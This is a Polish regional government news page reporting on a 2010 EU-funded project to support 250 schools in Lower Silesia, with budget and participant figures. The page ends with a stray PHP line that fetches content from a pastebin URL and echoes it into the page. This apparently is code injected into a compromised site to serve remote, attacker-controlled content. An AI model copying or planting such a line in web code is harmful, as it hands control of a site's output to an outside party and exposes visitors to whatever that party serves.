Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

14.01.2010 Dwanaście milionów złotych dla 250 dolnośląskich szkół

Od stycznia br. rozpoczęła się realizacja projektu systemowego Dolnośląska szkoła liderem projakościowych zmian w polskim systemie edukacji. Projekt jest realizowany przez Samorząd Województwa Dolnośląskiego.

 

Projekt realizowany jest w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych Programu Operacyjnego Kapitał Ludzki.

Projekt będzie realizowany do listopada 2011 roku, jego całkowity budżet wynosi 12 mln zł, a dofinansowanie unijne to 11 mln 820 tys. zł.

 

Głównym celem tego przedsięwzięcia jest wyrównanie szans uczniów o utrudnionym dostępie do edukacji, zmniejszanie różnic i podnoszenie poziomu nauczania, wspieranie indywidualnych zainteresowań i zdolności każdego ucznia ze szczególnym uwzględnieniem umiejętności kluczowych czyli samodzielnego myślenia, rozumowania matematycznego, stosowania alternatywnych rozwiązań oraz aktywnego korzystania z technologii informacyjno-komunikacyjnych. Jednym z efektów będzie poprawa wyników sprawdzianów i egzaminów zewnętrznych oraz konkursów przedmiotowych i międzyprzedmiotowych.

 

Projekt zakłada realizację programów rozwojowych w 250 dolnośląskich szkołach, z których co najmniej 100 jest położonych na obszarach wiejskich. Uczestnikami będzie nie mniej niż 7700 uczniów z tych szkół (w tej grupie musi być co najmniej 4020 dziewcząt) i 930 nauczycieli. Placówki te biorą jednocześnie udział w co najmniej jednym z dwóch komplementarnych projektach współfinansowanych z Regionalnego Programu Operacyjneg Dolnośląska e-szkoła i Pracownia przyrodnicza w każdej gminie.

 

Zaplanowano m.in. zajęcia pozalekcyjne (obejmujące koła zainteresowań i zajęcia dydaktyczno - wyrównawcze) oraz pozaszkolne realizowane z wykorzystaniem nowoczesnych technologii – platformy edukacyjnej, mobilnych pracowni komputerowych i interaktywnych oraz pracowni przyrodniczych, a także wycieczki dydaktyczne na terenie Dolnego Śląska i zajęcia w Multicentrum, które powstanie w Jaworze.

Projekt  Dolnośląska szkoła liderem projakościowych zmian w polskim systemie edukacji wpisuje się w założenia Strategii Rozwoju Województwa Dolnośląskiego do 2020 roku, krajowe strategie sektorowe oraz zalecenia Parlamentu Europejskiego.

 


<- Wstecz do: Aktualności

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");